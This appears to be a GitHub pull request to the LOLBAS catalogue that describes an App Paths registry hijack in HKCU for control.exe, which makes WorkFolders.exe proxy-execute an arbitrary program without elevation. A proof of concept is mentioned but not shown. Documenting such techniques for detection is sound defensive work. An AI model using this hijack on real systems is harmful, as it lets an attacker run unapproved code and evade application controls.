Skip to content

Comments

Add App Paths Hijacking (Proxy Execution) to WorkFolders.exe#490

Open
ghosts621 wants to merge 1 commit intoLOLBAS-Project:masterfrom
ghosts621:patch-1
Open

Add App Paths Hijacking (Proxy Execution) to WorkFolders.exe#490
ghosts621 wants to merge 1 commit intoLOLBAS-Project:masterfrom
ghosts621:patch-1

Conversation

@ghosts621
Copy link

Hi team,

Submitting a new execution technique for WorkFolders.exe.

Currently, the existing technique relies on dropping a payload named control.exe into the Current Working Directory (CWD).

New Finding (App Paths Hijacking):
By modifying the (Default) value of the HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\control.exe registry key, WorkFolders.exe will seamlessly proxy-execute the arbitrary executable defined in the registry.

  • Privileges: User (HKCU modification requires no elevation).
  • POC: I've attached a PowerShell POC in the Resources demonstrating the registry modification, execution, and clean-up.

Added the new command block, registry detection IOC, Gist resource link, and acknowledgement. Let me know if you need any adjustments!

Hi team,

Submitting a new execution technique for `WorkFolders.exe`.

Currently, the existing technique relies on dropping a payload named `control.exe` into the Current Working Directory (CWD). 

**New Finding (App Paths Hijacking):**
By modifying the `(Default)` value of the `HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\control.exe` registry key, `WorkFolders.exe` will seamlessly proxy-execute the arbitrary executable defined in the registry. 

* **Privileges:** User (HKCU modification requires no elevation).
* **POC:** I've attached a PowerShell POC in the Resources demonstrating the registry modification, execution, and clean-up.

Added the new command block, registry detection IOC, Gist resource link, and acknowledgement. Let me know if you need any adjustments!
@ghosts621 ghosts621 requested a review from a team as a code owner February 22, 2026 12:59
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

1 participant